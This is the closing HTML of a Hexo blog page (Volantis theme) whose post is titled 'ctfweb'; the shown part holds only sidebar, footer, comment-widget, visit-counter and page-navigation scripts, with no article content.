  <i class="fas fa-cog fa-spin fa-fw fa-2x"></i>
</div>

  </article>






</div>
<aside class='l_side'>
  
  
    
    



  <section class="widget toc-wrapper shadow desktop mobile" id="toc-div" >
    
  <header>
    
      <i class="fas fa-list fa-fw" aria-hidden="true"></i><span class='name'>本文目录</span>
    
  </header>


    <div class='content'>
        
    </div>
  </section>


  


</aside>



        
        
          <!--此文件用来存放一些不方便取值的变量-->
<!--思路大概是将值藏到重加载的区域内-->

<script>
  window.pdata={}
  pdata.ispage=true;
  pdata.postTitle="ctfweb";
  pdata.commentPath="";
  pdata.commentPlaceholder="";

  var l_header=document.getElementById("l_header");
  
  l_header.classList.add("show");
  
</script>

        
      </div>
      
  
  <footer class="footer clearfix">
    <br><br>
    
      
        <div class="aplayer-container">
          


        </div>
      
    
      
        <br>
        <div class="social-wrapper">
          
            
          
            
          
            
          
        </div>
      
    
      
        <div><p>Blog content follows the <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en">Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) License</a></p>
</div>
      
    
      
        
          <div><p><span id="lc-sv">本站总访问量为 <span id='number'><i class="fas fa-circle-notch fa-spin fa-fw" aria-hidden="true"></i></span> 次</span> <span id="lc-uv">访客数为 <span id='number'><i class="fas fa-circle-notch fa-spin fa-fw" aria-hidden="true"></i></span> 人</span></p>
</div>
        
      
    
      
        Use
        <a href="https://github.com/volantis-x/hexo-theme-volantis/tree/4.2.0" target="_blank" class="codename">Volantis</a>
        as theme
      
    
      
        <div class='copyright'>
        <p><a href="/">Copyright © 2017-2020 XXX</a></p>

        </div>
      
    
  </footer>


      <a id="s-top" class="fas fa-arrow-up fa-fw" href='javascript:void(0)'></a>
    </div>
  </div>
  <div>
    <script>
window.volantis={};
window.volantis.loadcss=document.getElementById("loadcss");
/********************脚本懒加载函数********************************/
function loadScript(src, cb) {
var HEAD = document.getElementsByTagName('head')[0] || document.documentElement;
var script = document.createElement('script');
script.setAttribute('type','text/javascript');
if (cb) script.onload = cb;
script.setAttribute('src', src);
HEAD.appendChild(script);
}
//https://github.com/filamentgroup/loadCSS
var loadCSS = function( href, before, media, attributes ){
	var doc = window.document;
	var ss = doc.createElement( "link" );
	var ref;
	if( before ){
		ref = before;
	}
	else {
		var refs = ( doc.body || doc.getElementsByTagName( "head" )[ 0 ] ).childNodes;
		ref = refs[ refs.length - 1];
	}
	var sheets = doc.styleSheets;
	if( attributes ){
		for( var attributeName in attributes ){
			if( attributes.hasOwnProperty( attributeName ) ){
				ss.setAttribute( attributeName, attributes[attributeName] );
			}
		}
	}
	ss.rel = "stylesheet";
	ss.href = href;
	ss.media = "only x";
	function ready( cb ){
		if( doc.body ){
			return cb();
		}
		setTimeout(function(){
			ready( cb );
		});
	}
	ready( function(){
		ref.parentNode.insertBefore( ss, ( before ? ref : ref.nextSibling ) );
	});
	var onloadcssdefined = function( cb ){
		var resolvedHref = ss.href;
		var i = sheets.length;
		while( i-- ){
			if( sheets[ i ].href === resolvedHref ){
				return cb();
			}
		}
		setTimeout(function() {
			onloadcssdefined( cb );
		});
	};
	function loadCB(){
		if( ss.addEventListener ){
			ss.removeEventListener( "load", loadCB );
		}
		ss.media = media || "all";
	}
	if( ss.addEventListener ){
		ss.addEventListener( "load", loadCB);
	}
	ss.onloadcssdefined = onloadcssdefined;
	onloadcssdefined( loadCB );
	return ss;
};
</script>
<script>
  
  loadCSS("https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14/css/all.min.css", window.volantis.loadcss);
  
  
  
  
</script>
<!-- required -->

<script src="https://cdn.jsdelivr.net/npm/jquery@3.5/dist/jquery.min.js"></script>

<script>
  function pjax_fancybox() {
    $(".md .gallery").find("img").each(function () { //渲染 fancybox
      var element = document.createElement("a"); // a 标签
      $(element).attr("class", "fancybox");
      $(element).attr("pjax-fancybox", "");  // 过滤 pjax
      $(element).attr("href", $(this).attr("src"));
      if ($(this).attr("data-original")) {
        $(element).attr("href", $(this).attr("data-original"));
      }
      $(element).attr("data-fancybox", "images");
      var caption = "";   // 描述信息
      if ($(this).attr('alt')) {  // 判断当前页面是否存在描述信息
        $(element).attr('data-caption', $(this).attr('alt'));
        caption = $(this).attr('alt');
      }
      var div = document.createElement("div");
      $(div).addClass("fancybox");
      $(this).wrap(div); // 最外层套 div ，其实主要作用还是 class 样式
      var span = document.createElement("span");
      $(span).addClass("image-caption");
      $(span).text(caption); // 加描述
      $(this).after(span);  // 再套一层描述
      $(this).wrap(element);  // 最后套 a 标签
    })
    $(".md .gallery").find("img").fancybox({
      selector: '[data-fancybox="images"]',
      hash: false,
      loop: false,
      closeClick: true,
      helpers: {
        overlay: {closeClick: true}
      },
      buttons: [
        "zoom",
        "close"
      ]
    });
  };
  function SCload_fancybox() {
    if ($(".md .gallery").find("img").length == 0) return;
    loadCSS("https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css", document.getElementById("loadcss"));
    setTimeout(function() {
      loadScript('https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js', pjax_fancybox)
    }, 1);
  };
  $(function () {
    SCload_fancybox();
  });
</script>


<!-- internal -->







  <script defer src="https://cdn.jsdelivr.net/npm/vanilla-lazyload@17.1.0/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazyload",
    threshold: 0
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    lazyLoadInstance.update();
  });
  document.addEventListener('pjax:complete', function () {
    lazyLoadInstance.update();
  });
</script>




  
  
    <script>
      window.FPConfig = {
        delay: 0,
        ignoreKeywords: [],
        maxRPS: 5,
        hoverDelay: 25
      };
    </script>
    <script defer src="https://cdn.jsdelivr.net/gh/gijo-varghese/flying-pages@2.1.2/flying-pages.min.js"></script>
  










  
  
<script src="/js/valine.js"></script>


<script>
  var GUEST_INFO = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link'.split(',').filter(function (item) {
    return GUEST_INFO.indexOf(item) > -1
  });
  var REQUIRED_FIELDS = ['nick', 'mail', 'link'];
  var requiredFields = 'nick,mail'.split(',').filter(function (item) {
    return REQUIRED_FIELDS.indexOf(item) > -1
  });

  function emoji(path, idx, ext) {
    return path + "/" + path + "-" + idx + "." + ext;
  }

  var emojiMaps = {};
  for (var i = 1; i <= 54; i++) {
    emojiMaps['tieba-' + i] = emoji('tieba', i, 'png');
  }
  for (var i = 1; i <= 101; i++) {
    emojiMaps['qq-' + i] = emoji('qq', i, 'gif');
  }
  for (var i = 1; i <= 116; i++) {
    emojiMaps['aru-' + i] = emoji('aru', i, 'gif');
  }
  for (var i = 1; i <= 125; i++) {
    emojiMaps['twemoji-' + i] = emoji('twemoji', i, 'png');
  }
  for (var i = 1; i <= 4; i++) {
    emojiMaps['weibo-' + i] = emoji('weibo', i, 'png');
  }

  function pjax_valine() {
    if(!document.querySelectorAll("#valine_container")[0])return;

    let pagePlaceholder = pdata.commentPlaceholder || "快来评论吧~";

    let path = pdata.commentPath;
    if (path.length == 0) {
      let defaultPath = '';
      path = defaultPath || decodeURI(window.location.pathname);
    }

    var valine = new Valine();
    valine.init({
      el: '#valine_container',
      meta: meta,
      placeholder: pagePlaceholder,
      path: path,
      appId: "",
      appKey: "",
      pageSize: '10',
      avatar: 'robohash',
      lang: 'zh-cn',
      visitor: 'true',
      highlight: 'true',
      mathJax: 'false',
      enableQQ: 'true',
      recordIP: 'false',
      requiredFields: requiredFields,
      emojiCDN: 'https://cdn.jsdelivr.net/gh/volantis-x/cdn-emoji/valine/',
      emojiMaps: emojiMaps
    })
  }

  $(function () {
    pjax_valine();
  });
</script>





  
<script src="/js/app.js"></script>



<!-- optional -->

  <script>
const SearchServiceimagePath="https://cdn.jsdelivr.net/gh/volantis-x/cdn-volantis@master/img/";
const ROOT =  ("/" || "/").endsWith('/') ? ("/" || "/") : ("//" || "/" );

$('.input.u-search-input').one('focus',function(){
	
		loadScript('/js/search/hexo.js',setSearchService);
	
})

function listenSearch(){
  
    customSearch = new HexoSearch({
      imagePath: SearchServiceimagePath
    });
  
}
function setSearchService() {
	listenSearch();
	
}
</script>











  <script defer>

  const LCCounter = {
    app_id: 'u9j57bwJod4EDmXWdxrwuqQT-MdYXbMMI',
    app_key: 'jfHtEKVE24j0IVCGHbvuFClp',
    custom_api_server: '',

    // 查询存储的记录
    getRecord(Counter, url, title) {
      return new Promise(function (resolve, reject) {
        Counter('get', '/classes/Counter?where=' + encodeURIComponent(JSON.stringify({url})))
          .then(resp => resp.json())
          .then(({results, code, error}) => {
            if (code === 401) {
              throw error;
            }
            if (results && results.length > 0) {
              var record = results[0];
              resolve(record);
            } else {
              Counter('post', '/classes/Counter', {url, title: title, times: 0})
                .then(resp => resp.json())
                .then((record, error) => {
                  if (error) {
                    throw error;
                  }
                  resolve(record);
                }).catch(error => {
                console.error('Failed to create', error);
                reject(error);
              });
            }
          }).catch((error) => {
          console.error('LeanCloud Counter Error:', error);
          reject(error);
        });
      })
    },

    // 发起自增请求
    increment(Counter, incrArr) {
      return new Promise(function (resolve, reject) {
        Counter('post', '/batch', {
          "requests": incrArr
        }).then((res) => {
          res = res.json();
          if (res.error) {
            throw res.error;
          }
          resolve(res);
        }).catch((error) => {
          console.error('Failed to save visitor count', error);
          reject(error);
        });
      });
    },

    // 构建自增请求体
    buildIncrement(objectId) {
      return {
        "method": "PUT",
        "path": `/1.1/classes/Counter/${ objectId }`,
        "body": {
          "times": {
            '__op': 'Increment',
            'amount': 1
          }
        }
      }
    },

    // 校验是否为有效的 UV
    validUV() {
      var key = 'LeanCloudUVTimestamp';
      var flag = localStorage.getItem(key);
      if (flag) {
        // 距离标记小于 24 小时则不计为 UV
        if (new Date().getTime() - parseInt(flag) <= 86400000) {
          return false;
        }
      }
      localStorage.setItem(key, new Date().getTime().toString());
      return true;
    },

    addCount(Counter) {
      var enableIncr = '' === 'true' && window.location.hostname !== 'localhost';
      enableIncr = true;
      var getterArr = [];
      var incrArr = [];
      // 请求 PV 并自增
      var pvCtn = document.querySelector('#lc-sv');
      if (pvCtn || enableIncr) {
        var pvGetter = this.getRecord(Counter, 'http://example.com' + '/#lc-sv', 'Visits').then((record) => {
          incrArr.push(this.buildIncrement(record.objectId))
          var eles = document.querySelectorAll('#lc-sv #number');
          if (eles.length > 0) {
            eles.forEach((el,index,array)=>{
              el.innerText = record.times + 1;
              if (pvCtn) {
                pvCtn.style.display = 'inline';
              }
            })
          }
        });
        getterArr.push(pvGetter);
      }

      // 请求 UV 并自增
      var uvCtn = document.querySelector('#lc-uv');
      if (uvCtn || enableIncr) {
        var uvGetter = this.getRecord(Counter, 'http://example.com' + '/#lc-uv', 'Visitors').then((record) => {
          var vuv = this.validUV();
          vuv && incrArr.push(this.buildIncrement(record.objectId))
          var eles = document.querySelectorAll('#lc-uv #number');
          if (eles.length > 0) {
            eles.forEach((el,index,array)=>{
              el.innerText = record.times + (vuv ? 1 : 0);
              if (uvCtn) {
                uvCtn.style.display = 'inline';
              }
            })
          }
        });
        getterArr.push(uvGetter);
      }

      // 请求文章的浏览数，如果是当前页面就自增
      var allPV = document.querySelectorAll('#lc-pv');
      if (allPV.length > 0 || enableIncr) {
        for (i = 0; i < allPV.length; i++) {
          let pv = allPV[i];
          let title = pv.getAttribute('data-title');
          var url = 'http://example.com' + pv.getAttribute('data-path');
          if (url) {
            var viewGetter = this.getRecord(Counter, url, title).then((record) => {
              // 是当前页面就自增
              let curPath = window.location.pathname;
              if (curPath.includes('index.html')) {
                curPath = curPath.substring(0, curPath.lastIndexOf('index.html'));
              }
              if (pv.getAttribute('data-path') == curPath) {
                incrArr.push(this.buildIncrement(record.objectId));
              }
              if (pv) {
                var ele = pv.querySelector('#lc-pv #number');
                if (ele) {
                  if (pv.getAttribute('data-path') == curPath) {
                    ele.innerText = (record.times || 0) + 1;
                  } else {
                    ele.innerText = record.times || 0;
                  }
                  pv.style.display = 'inline';
                }
              }
            });
            getterArr.push(viewGetter);
          }
        }
      }

      // 如果启动计数自增，批量发起自增请求
      if (enableIncr) {
        Promise.all(getterArr).then(() => {
          incrArr.length > 0 && this.increment(Counter, incrArr);
        })
      }

    },


    fetchData(api_server) {
      var Counter = (method, url, data) => {
        return fetch(`${ api_server }/1.1${ url }`, {
          method,
          headers: {
            'X-LC-Id': this.app_id,
            'X-LC-Key': this.app_key,
            'Content-Type': 'application/json',
          },
          body: JSON.stringify(data)
        });
      };
      this.addCount(Counter);
    },

    refreshCounter() {
      var api_server = this.app_id.slice(-9) !== '-MdYXbMMI' ? this.custom_api_server : `https://${ this.app_id.slice(0, 8).toLowerCase() }.api.lncldglobal.com`;
      if (api_server) {
        this.fetchData(api_server);
      } else {
        fetch('https://app-router.leancloud.cn/2/route?appId=' + this.app_id)
          .then(resp => resp.json())
          .then(({api_server}) => {
            this.fetchData('https://' + api_server);
          });
      }
    }

  };

  LCCounter.refreshCounter();

  document.addEventListener('pjax:complete', function () {
    LCCounter.refreshCounter();
  });
</script>








<script>
function listennSidebarTOC() {
  const navItems = document.querySelectorAll(".toc li");
  if (!navItems.length) return;
  const sections = [...navItems].map((element) => {
    const link = element.querySelector(".toc-link");
    const target = document.getElementById(
      decodeURI(link.getAttribute("href")).replace("#", "")
    );
    link.addEventListener("click", (event) => {
      event.preventDefault();
      window.scrollTo({
		top: target.offsetTop + 100,
		
		behavior: "smooth"
		
	  });
    });
    return target;
  });

  function activateNavByIndex(target) {
    if (target.classList.contains("active-current")) return;

    document.querySelectorAll(".toc .active").forEach((element) => {
      element.classList.remove("active", "active-current");
    });
    target.classList.add("active", "active-current");
    let parent = target.parentNode;
    while (!parent.matches(".toc")) {
      if (parent.matches("li")) parent.classList.add("active");
      parent = parent.parentNode;
    }
  }

  function findIndex(entries) {
    let index = 0;
    let entry = entries[index];
    if (entry.boundingClientRect.top > 0) {
      index = sections.indexOf(entry.target);
      return index === 0 ? 0 : index - 1;
    }
    for (; index < entries.length; index++) {
      if (entries[index].boundingClientRect.top <= 0) {
        entry = entries[index];
      } else {
        return sections.indexOf(entry.target);
      }
    }
    return sections.indexOf(entry.target);
  }

  function createIntersectionObserver(marginTop) {
    marginTop = Math.floor(marginTop + 10000);
    let intersectionObserver = new IntersectionObserver(
      (entries, observe) => {
        let scrollHeight = document.documentElement.scrollHeight + 100;
        if (scrollHeight > marginTop) {
          observe.disconnect();
          createIntersectionObserver(scrollHeight);
          return;
        }
        let index = findIndex(entries);
        activateNavByIndex(navItems[index]);
      },
      {
        rootMargin: marginTop + "px 0px -100% 0px",
        threshold: 0,
      }
    );
    sections.forEach((element) => {
      element && intersectionObserver.observe(element);
    });
  }
  createIntersectionObserver(document.documentElement.scrollHeight);
}

document.addEventListener("DOMContentLoaded", listennSidebarTOC);
document.addEventListener("pjax:success", listennSidebarTOC);
</script>

<!-- more -->




    
      


<script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script>


<script>
    var pjax;
    document.addEventListener('DOMContentLoaded', function () {
      pjax = new Pjax({
        elements: 'a[href]:not([href^="#"]):not([href="javascript:void(0)"]):not([pjax-fancybox])',
        selectors: [
          "title",
          "#l_cover",
          "#pjax-container",
          "#pjax-header-nav-list"
        ],
        cacheBust: false,   // url 地址追加时间戳，用以避免浏览器缓存
        timeout: 5000
      });
    });

    document.addEventListener('pjax:send', function (e) {
      //window.stop(); // 相当于点击了浏览器的停止按钮

      try {
        var currentUrl = window.location.pathname;
        var targetUrl = e.triggerElement.href;
        var banUrl = [""];
        if (banUrl[0] != "") {
          banUrl.forEach(item => {
            if(currentUrl.indexOf(item) != -1 || targetUrl.indexOf(item) != -1) {
              window.location.href = targetUrl;
            }
          });
        }
      } catch (error) {}

      window.subData = null; // 移除标题（用于一二级导航栏切换处）
      if (typeof $.fancybox != "undefined") {
        $.fancybox.close();    // 关闭弹窗
      }
      volantis.$switcher.removeClass('active'); // 关闭移动端激活的搜索框
      volantis.$header.removeClass('z_search-open'); // 关闭移动端激活的搜索框
      volantis.$wrapper.removeClass('sub'); // 跳转页面时关闭二级导航

      // 解绑事件 避免重复监听
      volantis.$topBtn.unbind('click');
      $('.menu a').unbind('click');
      $(window).unbind('resize');
      $(window).unbind('scroll');
      $(document).unbind('scroll');
      $(document).unbind('click');
      $('body').unbind('click');
	  
    });

    document.addEventListener('pjax:complete', function () {
      // 关于百度统计对 SPA 页面的处理：
      // 方案一：百度统计>管理>单页应用设置中，打开开启按钮即可对SPA进行统计。 https://tongji.baidu.com/web/help/article?id=324
      // 方案二：取消注释下列代码。 https://tongji.baidu.com/web/help/article?id=235
       

      // 关于谷歌统计对 SPA 页面的处理：
      // 当应用以动态方式加载内容并更新地址栏中的网址时，也应该更新通过 gtag.js 存储的网页网址。
      // https://developers.google.cn/analytics/devguides/collection/gtagjs/single-page-applications?hl=zh-cn
      
	 

      $('.nav-main').find('.list-v').not('.menu-phone').removeAttr("style",""); // 移除小尾巴的移除
      $('.menu-phone.list-v').removeAttr("style",""); // 移除小尾巴的移除
      $('script[data-pjax], .pjax-reload script').each(function () {
        $(this).parent().append($(this).remove());
      });
      try{
          if (typeof $.fancybox == "undefined") {
            SCload_fancybox();
          } else {
            pjax_fancybox();
          }
        
        
        
        
        
        
          pjax_valine();
        
        
        
        
        
        
      } catch (e) {
        console.log(e);
      }
	  
    });

    document.addEventListener('pjax:error', function (e) {
	  
      window.location.href = e.triggerElement.href;
    });
</script>

    
  </div>
</body>
</html>
